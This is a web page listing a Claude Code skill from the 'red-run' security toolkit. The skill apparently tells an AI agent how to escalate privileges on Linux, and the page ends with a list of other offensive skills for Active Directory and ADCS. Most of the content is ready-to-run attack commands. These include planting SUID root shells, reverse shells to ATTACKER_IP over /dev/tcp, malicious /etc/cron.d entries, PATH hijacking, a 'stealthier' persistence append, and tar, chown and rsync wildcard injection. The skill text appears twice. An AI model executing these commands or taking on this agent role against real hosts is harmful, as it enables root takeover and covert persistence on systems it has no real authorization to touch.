/linux-cron-service-abuse
Exploit cron jobs, systemd timers/services, D-Bus services, and Unix sockets for privilege escalation.
$ npx -y skills add blacklanternsecurity/red-run --skill linux-cron-service-abuse --agent claude-codeHow it fires
How this skill gets triggered: by you, by Claude, or both.
- Fires itselfAuto-invocation. Claude auto-loads it when your prompt matches the work.Auto-invocation is when the right skill fires by itself at the right moment, driven by a FLOW.md router and a hook, instead of you invoking it by name. It is the difference between a skill being installed and a skill actually getting used.Read the full definition →
- You can call itInvoke it directly when you want it.
- Slash command
/linux-cron-service-abuse
Context preview
The summary Claude sees to decide when to auto-load this skill.
Exploit cron jobs, systemd timers/services, D-Bus services, and Unix sockets for privilege escalation.
SKILL.md
linux-cron-service-abuse.SKILL.mdname: linux-cron-service-abuse
description: >
Exploit cron jobs, systemd timers/services, D-Bus services, and Unix sockets
for privilege escalation.
keywords:
- cron privesc
- wildcard injection
- systemd abuse
- dbus exploit
- pspy found root process
- writable cron script
- polkit bypass
- pwnkit
tools:
- pspy
- busctl
- gdbus
- dbus-send
- systemctl
- crontab
opsec: medium
Linux Cron, Service, and D-Bus Exploitation
You are helping a penetration tester exploit scheduled tasks, services, and inter-process communication mechanisms for privilege escalation. All testing is under explicit written authorization.
Engagement Logging
Check for `./engagement/` directory. If absent, proceed without logging.
When an engagement directory exists:
- Print `[linux-cron-service-abuse] Activated → <target>` to the screen on activation.
- **Evidence** → save significant output to `engagement/evidence/` with
descriptive filenames (e.g., `sqli-users-dump.txt`, `ssrf-aws-creds.json`).
State Management
Call `get_state_summary()` from the state MCP server to read current engagement state. Use it to:
- Skip re-testing targets, parameters, or vulns already confirmed
- Leverage existing credentials or access for this technique
- Understand what's been tried and failed (check Blocked section)
Your return summary must include:
- New targets/hosts discovered (with ports and services)
- New credentials or tokens found
- Access gained or changed (user, privilege level, method)
- Vulnerabilities confirmed (with status and severity)
- Pivot paths identified (what leads where)
- Blocked items (what failed and why, whether retryable)
Prerequisites
- Shell access on Linux target
- At least one of: writable cron script, wildcard in cron command, writable systemd
unit, exploitable D-Bus service, writable Unix socket
- pspy recommended for discovering hidden scheduled tasks
Step 1: Assess Scheduled Task and Service Landscape
If not already provided by linux-discovery, enumerate:
# Cron jobs
crontab -l 2>/dev/null
cat /etc/crontab 2>/dev/null
ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ 2>/dev/null
cat /etc/cron.d/* 2>/dev/null
# Systemd timers and services
systemctl list-timers --all --no-pager 2>/dev/null
systemctl list-units --type=service --state=running --no-pager 2>/dev/null
# Process monitoring (leave running)
./pspy64 -pf -i 1000
Classify findings and proceed to the relevant section below.
Step 2: Cron Job Exploitation
Writable Cron Script
If a root cron job executes a script you can modify:
# Verify write access
ls -la /path/to/cron_script.sh
# Option 1: SUID bash (persistent)
echo '#!/bin/bash
cp /bin/bash /tmp/rootbash
chown root:root /tmp/rootbash
chmod 4755 /tmp/rootbash' > /path/to/cron_script.sh
chmod +x /path/to/cron_script.sh
# Wait for cron execution, then:
/tmp/rootbash -p
# Option 2: Reverse shell (immediate access)
echo '#!/bin/bash
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1' > /path/to/cron_script.sh
chmod +x /path/to/cron_script.sh
# Start listener: nc -lvnp PORT
# Option 3: Append to existing script (stealthier)
echo '' >> /path/to/cron_script.sh
echo 'cp /bin/bash /tmp/.rootbash && chmod 4755 /tmp/.rootbash' >> /path/to/cron_script.sh
PATH Manipulation in Cron
If a cron job calls a binary without a full path:
# Example crontab entry:
# * * * * * root backup_script
# Check cron PATH (first line of /etc/crontab)
head -5 /etc/crontab
# Default: PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Find a writable directory that appears before the real binary in PATH
echo $PATH | tr ':' '\n' | while read d; do [ -w "$d" ] && echo "WRITABLE: $d"; done
# Create hijack binary in writable PATH directory
cat > /writable/path/backup_script << 'EOF'
#!/bin/bash
cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash
# Run original to avoid breaking things
/usr/bin/backup_script "$@"
EOF
chmod +x /writable/path/backup_script
Writable Cron Directory Injection
If you can write to cron directories:
# Direct injection to /etc/cron.d/ (if writable)
cat > /etc/cron.d/exploit << 'EOF'
* * * * * root /bin/bash -c 'cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash'
EOF
# Or via crontab command (user crontab)
(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'") | crontab -
**Important:** Cron files in `/etc/cron.d/` must have correct permissions (644, owned by root) or they may be ignored. User crontabs via `crontab -e` don't have this restriction.
Step 3: Wildcard Injection
When a root-owned cron job or script uses wildcards (`*`) in commands, you can inject arguments via specially-named files.
Tar Checkpoint Injection
**Target pattern:** `tar czf backup.tar.gz *` or `tar czf backup.tar.gz /path/*`
# Navigate to the directory where tar runs with wildcards
cd /path/to/target_directory
# Create payload script
cat > shell.sh << 'EOF'
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod 4755 /tmp/rootbash
EOF
chmod +x shell.sh
# Create checkpoint injection files
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
# When root's cron runs: tar czf backup.tar.gz *
# The * expands to include --checkpoint=1 and --checkpoint-action=exec=sh shell.sh
# tar executes shell.sh as root
**Wait for execution, then:** `/tmp/rootbash -p`
Chown/Chmod Reference File Injection
**Target pattern:** `chown -R user:group *` or `chmod -R 755 *`
cd /path/to/target_directory
# Create reference file that points to a file with desired ownership
touch -- '--reference=/etc/passwd'
# When root runs: chown nobody:nobody *
# The --reference flag overrides and sets ownership to match /etc/passwd (root:root)
Rsync Shell Injection
**Target pattern:** `rsync -az * backup:/dest/`
cd /path/to/target_directory
touch -- '-e sh shell.sh'
# When
Read more
name: linux-cron-service-abuse description: > Exploit cron jobs, systemd timers/services, D-Bus services, and Unix sockets for privilege escalation. keywords: - cron privesc - wildcard injection - systemd abuse - dbus exploit - pspy found root process - writable cron script - polkit bypass - pwnkit tools: - pspy - busctl - gdbus - dbus-send - systemctl - crontab opsec: medium
Linux Cron, Service, and D-Bus Exploitation
You are helping a penetration tester exploit scheduled tasks, services, and inter-process communication mechanisms for privilege escalation. All testing is under explicit written authorization.
Engagement Logging
Check for `./engagement/` directory. If absent, proceed without logging.
When an engagement directory exists:
- Print `[linux-cron-service-abuse] Activated → <target>` to the screen on activation.
- **Evidence** → save significant output to `engagement/evidence/` with
descriptive filenames (e.g., `sqli-users-dump.txt`, `ssrf-aws-creds.json`).
State Management
Call `get_state_summary()` from the state MCP server to read current engagement state. Use it to:
- Skip re-testing targets, parameters, or vulns already confirmed
- Leverage existing credentials or access for this technique
- Understand what's been tried and failed (check Blocked section)
Your return summary must include:
- New targets/hosts discovered (with ports and services)
- New credentials or tokens found
- Access gained or changed (user, privilege level, method)
- Vulnerabilities confirmed (with status and severity)
- Pivot paths identified (what leads where)
- Blocked items (what failed and why, whether retryable)
Prerequisites
- Shell access on Linux target
- At least one of: writable cron script, wildcard in cron command, writable systemd
unit, exploitable D-Bus service, writable Unix socket
- pspy recommended for discovering hidden scheduled tasks
Step 1: Assess Scheduled Task and Service Landscape
If not already provided by linux-discovery, enumerate:
# Cron jobs crontab -l 2>/dev/null cat /etc/crontab 2>/dev/null ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ 2>/dev/null cat /etc/cron.d/* 2>/dev/null # Systemd timers and services systemctl list-timers --all --no-pager 2>/dev/null systemctl list-units --type=service --state=running --no-pager 2>/dev/null # Process monitoring (leave running) ./pspy64 -pf -i 1000
Classify findings and proceed to the relevant section below.
Step 2: Cron Job Exploitation
Writable Cron Script
If a root cron job executes a script you can modify:
# Verify write access ls -la /path/to/cron_script.sh # Option 1: SUID bash (persistent) echo '#!/bin/bash cp /bin/bash /tmp/rootbash chown root:root /tmp/rootbash chmod 4755 /tmp/rootbash' > /path/to/cron_script.sh chmod +x /path/to/cron_script.sh # Wait for cron execution, then: /tmp/rootbash -p
# Option 2: Reverse shell (immediate access) echo '#!/bin/bash bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1' > /path/to/cron_script.sh chmod +x /path/to/cron_script.sh # Start listener: nc -lvnp PORT
# Option 3: Append to existing script (stealthier) echo '' >> /path/to/cron_script.sh echo 'cp /bin/bash /tmp/.rootbash && chmod 4755 /tmp/.rootbash' >> /path/to/cron_script.sh
PATH Manipulation in Cron
If a cron job calls a binary without a full path:
# Example crontab entry: # * * * * * root backup_script # Check cron PATH (first line of /etc/crontab) head -5 /etc/crontab # Default: PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # Find a writable directory that appears before the real binary in PATH echo $PATH | tr ':' '\n' | while read d; do [ -w "$d" ] && echo "WRITABLE: $d"; done # Create hijack binary in writable PATH directory cat > /writable/path/backup_script << 'EOF' #!/bin/bash cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash # Run original to avoid breaking things /usr/bin/backup_script "$@" EOF chmod +x /writable/path/backup_script
Writable Cron Directory Injection
If you can write to cron directories:
# Direct injection to /etc/cron.d/ (if writable) cat > /etc/cron.d/exploit << 'EOF' * * * * * root /bin/bash -c 'cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash' EOF # Or via crontab command (user crontab) (crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'") | crontab -
**Important:** Cron files in `/etc/cron.d/` must have correct permissions (644, owned by root) or they may be ignored. User crontabs via `crontab -e` don't have this restriction.
Step 3: Wildcard Injection
When a root-owned cron job or script uses wildcards (`*`) in commands, you can inject arguments via specially-named files.
Tar Checkpoint Injection
**Target pattern:** `tar czf backup.tar.gz *` or `tar czf backup.tar.gz /path/*`
# Navigate to the directory where tar runs with wildcards cd /path/to/target_directory # Create payload script cat > shell.sh << 'EOF' #!/bin/bash cp /bin/bash /tmp/rootbash chmod 4755 /tmp/rootbash EOF chmod +x shell.sh # Create checkpoint injection files touch -- '--checkpoint=1' touch -- '--checkpoint-action=exec=sh shell.sh' # When root's cron runs: tar czf backup.tar.gz * # The * expands to include --checkpoint=1 and --checkpoint-action=exec=sh shell.sh # tar executes shell.sh as root
**Wait for execution, then:** `/tmp/rootbash -p`
Chown/Chmod Reference File Injection
**Target pattern:** `chown -R user:group *` or `chmod -R 755 *`
cd /path/to/target_directory # Create reference file that points to a file with desired ownership touch -- '--reference=/etc/passwd' # When root runs: chown nobody:nobody * # The --reference flag overrides and sets ownership to match /etc/passwd (root:root)
Rsync Shell Injection
**Target pattern:** `rsync -az * backup:/dest/`
cd /path/to/target_directory touch -- '-e sh shell.sh' # When
Security assessment toolkit for Claude Code. red-run combines skills, MCP servers, and Claude Code agent teams with routing logic that guides Claude and the operator through the phases of a security assessment — recon, initial access, lateral movement,
Other skills on red-run.
- /acl-abuse
Exploits misconfigured Active Directory ACLs for privilege escalation. Covers GenericAll, GenericWrite, WriteDACL, WriteOwner, ForceChangePassword, targeted Kerberoasting via SPN manipulation, shadow credentials (msDS-KeyCredentialLink → PKINIT), and AdminSDHolder persistence.
Open skill - /ad-discovery
Enumerates Active Directory domains and maps attack surface for penetration testing.
Open skill - /ad-persistence
Establishes persistent access in Active Directory environments after domain compromise. Covers DCShadow (rogue DC attribute modification), Skeleton Key (LSASS master password), custom SSP injection (credential logging via mimilib/memssp), security descriptor backdoors
Open skill - /adcs-access-and-relay
Exploits ADCS through ACL abuse on templates/CA objects and NTLM relay to enrollment endpoints. Covers ESC4 (template ACL → modify to ESC1), ESC5 (PKI object ACLs), ESC7 (ManageCA/ManageCertificates abuse), ESC8 (NTLM relay to HTTP enrollment), ESC11 (NTLM relay to ICPR RPC).
Open skill - /adcs-persistence
Establishes persistence and exploits weak certificate mapping in AD CS. Covers ESC9 (no security extension), ESC10 (weak certificate mapping), ESC12-15 (YubiHSM, issuance policy, altSecIdentities, application policies), Golden Certificate (forge with stolen CA key), certificate
Open skill - /adcs-template-abuse
Exploits misconfigured AD CS certificate templates to impersonate any domain user via SAN manipulation or enrollment agent abuse. Covers ESC1 (enrollee supplies subject), ESC2 (any-purpose/no EKU), ESC3 (enrollment agent), ESC6 (EDITF_ATTRIBUTESUBJECTALTNAME2 CA flag).
Open skill

